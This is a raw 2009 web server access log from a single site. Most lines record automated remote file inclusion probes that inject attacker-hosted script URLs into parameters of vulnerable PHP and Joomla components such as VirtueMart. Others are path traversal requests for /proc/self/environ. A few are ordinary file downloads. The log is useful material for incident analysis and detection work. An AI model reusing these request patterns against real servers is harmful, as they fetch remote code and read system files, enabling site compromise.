221.141.3.98 - - [28/Apr/2009:12:04:14 -0700] "GET /logs/access_090408.log/errors.php?error=http://www.kvsc.ru/files/i?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
221.141.3.98 - - [28/Apr/2009:12:04:14 -0700] "GET /logs/access_090408.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
221.141.3.98 - - [28/Apr/2009:12:04:14 -0700] "GET /logs/access_090408.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
62.75.255.125 - - [28/Apr/2009:12:04:32 -0700] "GET /start.php?s=http://netcoreinvestments.com/idste.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.825" "www.dmulk.com"
203.22.204.193 - - [28/Apr/2009:12:04:35 -0700] "GET /index.php?p=http://91.203.132.162/.q/id.txt?? HTTP/1.1" 200 43269 "-" "libwww-perl/5.76" "www.dmulk.com"
218.150.79.146 - - [28/Apr/2009:12:05:04 -0700] "GET /logs/access_080401.log/file_upload.php?sbp=http://www.centermna.co.kr/bbs/data/module/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
122.116.178.20 - - [28/Apr/2009:12:05:07 -0700] "GET /logs/access_071122.log/inc/cmses/aedatingCMS.php?dir[inc]=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
87.106.109.88 - - [28/Apr/2009:12:05:09 -0700] "GET //ask_password.php?dir=http://pallmall4.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
87.106.109.88 - - [28/Apr/2009:12:05:09 -0700] "GET /logs/access_090103.log///ask_password.php?dir=http://pallmall4.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
87.106.109.88 - - [28/Apr/2009:12:05:09 -0700] "GET /logs///ask_password.php?dir=http://pallmall4.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
87.106.109.88 - - [28/Apr/2009:12:05:13 -0700] "GET /logs/access_090314.log///ask_password.php?dir=http://pallmall4.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
122.116.178.20 - - [28/Apr/2009:12:05:16 -0700] "GET /logs/access_071123.log/inc/cmses/aedatingCMS.php?dir[inc]=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
221.141.3.98 - - [28/Apr/2009:12:05:18 -0700] "GET /logs/access_090415.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kvsc.ru/files/i?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
221.141.3.98 - - [28/Apr/2009:12:05:18 -0700] "GET /logs/access_090415.log/errors.php?error=http://www.kvsc.ru/files/i?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
221.141.3.98 - - [28/Apr/2009:12:05:18 -0700] "GET /logs/access_090415.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
221.141.3.98 - - [28/Apr/2009:12:05:19 -0700] "GET /logs/access_090415.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
62.75.255.125 - - [28/Apr/2009:12:05:25 -0700] "GET /logs/access_071228.log//skin/zero_vote/error.php?dir=http://netcoreinvestments.com/idste.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
62.75.255.125 - - [28/Apr/2009:12:05:26 -0700] "GET /skin/zero_vote/error.php?dir=http://netcoreinvestments.com/idste.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
202.111.175.179 - - [28/Apr/2009:12:05:26 -0700] "GET /logs/access_090403.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.ybkor.com/bbs//skin/zero_vote/logs/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.75.255.125 - - [28/Apr/2009:12:05:27 -0700] "GET /logs/access_080129.log//skin/zero_vote/error.php?dir=http://netcoreinvestments.com/idste.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
202.111.175.179 - - [28/Apr/2009:12:05:27 -0700] "GET /logs/access_090403.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.ybkor.com/bbs//skin/zero_vote/logs/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.111.175.179 - - [28/Apr/2009:12:05:27 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.ybkor.com/bbs//skin/zero_vote/logs/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.111.175.179 - - [28/Apr/2009:12:05:28 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.ybkor.com/bbs//skin/zero_vote/logs/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.111.175.179 - - [28/Apr/2009:12:05:28 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.ybkor.com/bbs//skin/zero_vote/logs/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.111.175.179 - - [28/Apr/2009:12:05:28 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.ybkor.com/bbs//skin/zero_vote/logs/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
121.165.73.157 - - [28/Apr/2009:12:06:01 -0700] "GET /logs/access_090207.log/index.php?opcao=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [28/Apr/2009:12:06:01 -0700] "GET /logs/index.php?opcao=http://theblythes.net/cal/mydb?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [28/Apr/2009:12:06:01 -0700] "GET /logs/access_090207.log%20%20/index.php?opcao=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [28/Apr/2009:12:06:01 -0700] "GET /logs/access_090207.log/index.php?opcao=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [28/Apr/2009:12:06:01 -0700] "GET /logs/index.php?opcao=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [28/Apr/2009:12:06:01 -0700] "GET /logs/access_090207.log%20%20/index.php?opcao=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.41 - - [28/Apr/2009:12:06:02 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
64.157.4.43 - - [28/Apr/2009:12:06:03 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
221.141.3.98 - - [28/Apr/2009:12:06:08 -0700] "GET /logs/access_090415.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kvsc.ru/files/i?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
221.141.3.98 - - [28/Apr/2009:12:06:08 -0700] "GET /logs/access_090415.log/errors.php?error=http://www.kvsc.ru/files/i?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
221.141.3.98 - - [28/Apr/2009:12:06:08 -0700] "GET /logs/access_090415.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
221.141.3.98 - - [28/Apr/2009:12:06:08 -0700] "GET /logs/access_090415.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
121.165.73.157 - - [28/Apr/2009:12:06:11 -0700] "GET /logs/access_090118.log%20%20/index.php?opcao=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [28/Apr/2009:12:06:12 -0700] "GET /logs/access_090118.log%20%20/index.php?opcao=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.41 - - [28/Apr/2009:12:06:16 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
64.157.4.43 - - [28/Apr/2009:12:06:17 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
121.165.73.157 - - [28/Apr/2009:12:06:40 -0700] "GET /index.php?opcao=http://theblythes.net/cal/mydb?? HTTP/1.1" 200 43275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [28/Apr/2009:12:06:42 -0700] "GET /index.php?opcao=http://theblythes.net/cal/mydb?? HTTP/1.1" 200 43275 "-" "Mozilla/5.0" "www.dmulk.com"
122.116.178.20 - - [28/Apr/2009:12:06:58 -0700] "GET /logs/access_071122.log/inc/cmses/aedatingCMS.php?dir[inc]=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
122.116.178.20 - - [28/Apr/2009:12:07:00 -0700] "GET /logs/access_071123.log/inc/cmses/aedatingCMS.php?dir[inc]=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
62.75.255.125 - - [28/Apr/2009:12:07:21 -0700] "GET /skin/zero_vote/error.php?dir=http://netcoreinvestments.com/idste.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.825" "www.dmulk.com"
200.93.147.154 - - [28/Apr/2009:12:07:22 -0700] "GET /logs/access_080801.log//index2.php?option=com_wrapper&Itemid=&mosConfig_absolute_path=http://h1.ripway.com/lia33/elsi.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
200.93.147.154 - - [28/Apr/2009:12:07:22 -0700] "GET /logs//index2.php?option=com_wrapper&Itemid=&mosConfig_absolute_path=http://h1.ripway.com/lia33/elsi.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
200.93.147.154 - - [28/Apr/2009:12:07:22 -0700] "GET /index2.php?option=com_wrapper&Itemid=&mosConfig_absolute_path=http://h1.ripway.com/lia33/elsi.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
202.111.175.179 - - [28/Apr/2009:12:07:38 -0700] "GET /logs/access_090311.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.ybkor.com/bbs//skin/zero_vote/logs/idd.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.111.175.179 - - [28/Apr/2009:12:07:39 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.ybkor.com/bbs//skin/zero_vote/logs/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.111.175.179 - - [28/Apr/2009:12:07:39 -0700] "GET /logs/access_090311.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.ybkor.com/bbs//skin/zero_vote/logs/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.111.175.179 - - [28/Apr/2009:12:07:39 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.ybkor.com/bbs//skin/zero_vote/logs/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.111.175.179 - - [28/Apr/2009:12:07:40 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.ybkor.com/bbs//skin/zero_vote/logs/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.111.175.179 - - [28/Apr/2009:12:07:40 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.ybkor.com/bbs//skin/zero_vote/logs/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.111.175.179 - - [28/Apr/2009:12:08:29 -0700] "GET /logs/access_090407.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.ybkor.com/bbs//skin/zero_vote/logs/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.111.175.179 - - [28/Apr/2009:12:08:30 -0700] "GET /logs/access_090407.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.ybkor.com/bbs//skin/zero_vote/logs/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.157.4.42 - - [28/Apr/2009:12:08:50 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
121.165.73.157 - - [28/Apr/2009:12:09:00 -0700] "GET /logs/access_081007.log/index.php?go=http://www.winewise.de///administrator/components/com_virtuemart/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [28/Apr/2009:12:09:01 -0700] "GET /logs/index.php?go=http://www.winewise.de///administrator/components/com_virtuemart/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.42 - - [28/Apr/2009:12:09:04 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
121.165.73.157 - - [28/Apr/2009:12:09:04 -0700] "GET /logs/index.php?go=http://www.winewise.de///administrator/components/com_virtuemart/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [28/Apr/2009:12:09:04 -0700] "GET /logs/access_081007.log/index.php?go=http://www.winewise.de///administrator/components/com_virtuemart/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.41 - - [28/Apr/2009:12:09:06 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
77.232.68.137 - - [28/Apr/2009:12:09:18 -0700] "GET /logs/access_090223.log//components/com_smf/smf.php?mosConfig_absolute_path=http://ddwvideo.dd.funpic.org/osy2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
77.232.68.137 - - [28/Apr/2009:12:09:18 -0700] "GET /components/com_smf/smf.php?mosConfig_absolute_path=http://ddwvideo.dd.funpic.org/osy2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
77.232.68.137 - - [28/Apr/2009:12:09:18 -0700] "GET /logs//components/com_smf/smf.php?mosConfig_absolute_path=http://ddwvideo.dd.funpic.org/osy2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.157.4.41 - - [28/Apr/2009:12:09:22 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
77.232.68.137 - - [28/Apr/2009:12:09:23 -0700] "GET /logs/access_081225.log//components/com_smf/smf.php?mosConfig_absolute_path=http://ddwvideo.dd.funpic.org/osy2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
121.165.73.157 - - [28/Apr/2009:12:09:28 -0700] "GET /index.php?go=http://www.winewise.de///administrator/components/com_virtuemart/uiu.txt?? HTTP/1.1" 200 43369 "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [28/Apr/2009:12:09:38 -0700] "GET /logs/access_080801.log//index2.php?option=com_wrapper&Itemid=&mosConfig_absolute_path=http://h1.ripway.com/hoki121/elsi.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
200.93.147.154 - - [28/Apr/2009:12:09:39 -0700] "GET /index2.php?option=com_wrapper&Itemid=&mosConfig_absolute_path=http://h1.ripway.com/hoki121/elsi.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
200.93.147.154 - - [28/Apr/2009:12:09:40 -0700] "GET /logs//index2.php?option=com_wrapper&Itemid=&mosConfig_absolute_path=http://h1.ripway.com/hoki121/elsi.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
77.232.68.137 - - [28/Apr/2009:12:09:43 -0700] "GET /logs/access_090223.log//components/com_smf/smf.php?mosConfig_absolute_path=http://http://ddwvideo.dd.funpic.org/osy2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
77.232.68.137 - - [28/Apr/2009:12:09:44 -0700] "GET /logs//components/com_smf/smf.php?mosConfig_absolute_path=http://http://ddwvideo.dd.funpic.org/osy2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
77.232.68.137 - - [28/Apr/2009:12:09:44 -0700] "GET /components/com_smf/smf.php?mosConfig_absolute_path=http://http://ddwvideo.dd.funpic.org/osy2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
121.165.73.157 - - [28/Apr/2009:12:09:48 -0700] "GET /index.php?go=http://www.winewise.de///administrator/components/com_virtuemart/uiu.txt?? HTTP/1.1" 200 43369 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [28/Apr/2009:12:09:50 -0700] "GET /logs/access_080806.log%20%20/index.php?content=http://www.winewise.de///administrator/components/com_virtuemart/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [28/Apr/2009:12:09:50 -0700] "GET /logs/index.php?content=http://www.winewise.de///administrator/components/com_virtuemart/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
77.232.68.137 - - [28/Apr/2009:12:09:51 -0700] "GET /logs/access_081225.log//components/com_smf/smf.php?mosConfig_absolute_path=http://http://ddwvideo.dd.funpic.org/osy2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.157.4.41 - - [28/Apr/2009:12:09:51 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
202.111.175.179 - - [28/Apr/2009:12:09:53 -0700] "GET /logs/access_080613.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.ybkor.com/bbs//skin/zero_vote/logs/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.111.175.179 - - [28/Apr/2009:12:09:53 -0700] "GET /logs/access_080613.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.ybkor.com/bbs//skin/zero_vote/logs/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.111.175.179 - - [28/Apr/2009:12:09:53 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.ybkor.com/bbs//skin/zero_vote/logs/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
121.165.73.157 - - [28/Apr/2009:12:09:54 -0700] "GET /logs/access_081007.log%20%20/index.php?go=http://www.winewise.de///administrator/components/com_virtuemart/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
202.111.175.179 - - [28/Apr/2009:12:09:54 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.ybkor.com/bbs//skin/zero_vote/logs/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.111.175.179 - - [28/Apr/2009:12:09:54 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.ybkor.com/bbs//skin/zero_vote/logs/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.111.175.179 - - [28/Apr/2009:12:09:54 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.ybkor.com/bbs//skin/zero_vote/logs/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
121.165.73.157 - - [28/Apr/2009:12:09:57 -0700] "GET /logs/access_080806.log%20%20/index.php?content=http://www.winewise.de///administrator/components/com_virtuemart/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [28/Apr/2009:12:09:57 -0700] "GET /logs/index.php?content=http://www.winewise.de///administrator/components/com_virtuemart/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.41 - - [28/Apr/2009:12:09:58 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
121.165.73.157 - - [28/Apr/2009:12:10:00 -0700] "GET /index.php?content=http://www.winewise.de///administrator/components/com_virtuemart/uiu.txt?? HTTP/1.1" 500 292 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [28/Apr/2009:12:10:01 -0700] "GET /logs/access_081007.log%20%20/index.php?go=http://www.winewise.de///administrator/components/com_virtuemart/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [28/Apr/2009:12:10:03 -0700] "GET /logs/access_090228.log%20%20/index.php?content=http://www.winewise.de///administrator/components/com_virtuemart/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [28/Apr/2009:12:10:08 -0700] "GET /logs/access_090228.log%20%20/index.php?content=http://www.winewise.de///administrator/components/com_virtuemart/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.41 - - [28/Apr/2009:12:10:15 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
202.111.175.179 - - [28/Apr/2009:12:10:16 -0700] "GET /logs/access_090403.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.ybkor.com/bbs//skin/zero_vote/logs/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.111.175.179 - - [28/Apr/2009:12:10:17 -0700] "GET /logs/access_090403.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.ybkor.com/bbs//skin/zero_vote/logs/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
121.165.73.157 - - [28/Apr/2009:12:10:41 -0700] "GET /index.php?content=http://www.winewise.de///administrator/components/com_virtuemart/uiu.txt?? HTTP/1.1" 200 43379 "-" "Mozilla/5.0" "www.dmulk.com"
202.111.175.179 - - [28/Apr/2009:12:10:42 -0700] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.ybkor.com/bbs//skin/zero_vote/logs/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "dmulk.com"
202.111.175.179 - - [28/Apr/2009:12:10:42 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.ybkor.com/bbs//skin/zero_vote/logs/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "dmulk.com"
202.111.175.179 - - [28/Apr/2009:12:10:43 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.ybkor.com/bbs//skin/zero_vote/logs/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "dmulk.com"
121.165.73.157 - - [28/Apr/2009:12:10:44 -0700] "GET /logs/access_080703.log%20%20/index.php?go=http://www.winewise.de///administrator/components/com_virtuemart/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [28/Apr/2009:12:10:49 -0700] "GET /logs/access_080703.log%20%20/index.php?go=http://www.winewise.de///administrator/components/com_virtuemart/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
202.111.175.179 - - [28/Apr/2009:12:10:54 -0700] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.ybkor.com/bbs//skin/zero_vote/logs/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "dmulk.com"
202.111.175.179 - - [28/Apr/2009:12:10:55 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.ybkor.com/bbs//skin/zero_vote/logs/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "dmulk.com"
202.111.175.179 - - [28/Apr/2009:12:10:55 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.ybkor.com/bbs//skin/zero_vote/logs/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "dmulk.com"
163.24.136.10 - - [28/Apr/2009:12:11:07 -0700] "GET /logs//include/admin.lib.inc.php?site_path=http://www.koreavan.kr/technote6//data/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
163.24.136.10 - - [28/Apr/2009:12:11:08 -0700] "GET /logs/access_080919.log//include/admin.lib.inc.php?site_path=http://www.koreavan.kr/technote6//data/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
163.24.136.10 - - [28/Apr/2009:12:11:10 -0700] "GET /include/admin.lib.inc.php?site_path=http://www.koreavan.kr/technote6//data/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
163.24.136.10 - - [28/Apr/2009:12:11:16 -0700] "GET /logs/access_081015.log//include/admin.lib.inc.php?site_path=http://www.koreavan.kr/technote6//data/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
212.24.242.98 - - [28/Apr/2009:12:11:18 -0700] "GET /blog/wp-content/gallery/2008-yuma/thumbs/thumbs_016.jpg HTTP/1.1" 200 0 "-" "Mozilla/4.0 (compatible;)" "dmulk.com"
121.165.73.157 - - [28/Apr/2009:12:11:22 -0700] "GET /include/admin.lib.inc.php?site_path=http://plengeh.co.cc/scripts/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
